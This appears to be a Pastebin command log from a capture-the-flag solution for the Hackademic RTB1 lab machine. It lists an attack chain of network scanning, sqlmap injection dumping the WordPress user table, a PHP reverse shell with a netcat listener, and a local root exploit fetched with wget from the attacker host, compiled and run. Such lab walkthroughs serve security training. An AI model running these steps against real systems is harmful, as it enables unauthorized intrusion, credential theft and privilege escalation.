Mito125

Hackademic RTB1

Jan 17th, 2012
406
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.73 KB | None | 0 0
  1. netdiscover -i eth1
  2. nmap -sV -n -O 192.168.1.3
  3. firefox 192.168.1.3 &
  4. sqlmap -u http://192.168.1.3/Hackademic_RTB1/?cat=1
  5. sqlmap -u http://192.168.1.3/Hackademic_RTB1/?cat=1 --dbs
  6. sqlmap -u http://192.168.1.3/Hackademic_RTB1/?cat=1 -D wordpress --tables
  7. sqlmap -u http://192.168.1.3/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump
  8. firefox http://192.168.1.3/Hackademic_RTB1/wp-admin/
  9. geany /pentest/web/php-reverse-shell-1.0/php-reverse-shell.php
  10. nc -l -v -n -p 31337
  11. id
  12. uname -a
  13. cat files.csv | grep -i linux | grep -i local
  14. cp platform/linux/local/15285.c /var/www/
  15. cd /var/www/
  16. chmod 755 15285.c
  17. /etc/init.d/apache2 start
  18. nano 15285.c
  19. wget http://192.168.1.2/15285.c
  20. gcc -o script 15285.c
  21. ./script
  22. cd /root/
  23. cat key.txt
Add Comment
Please, Sign In to add comment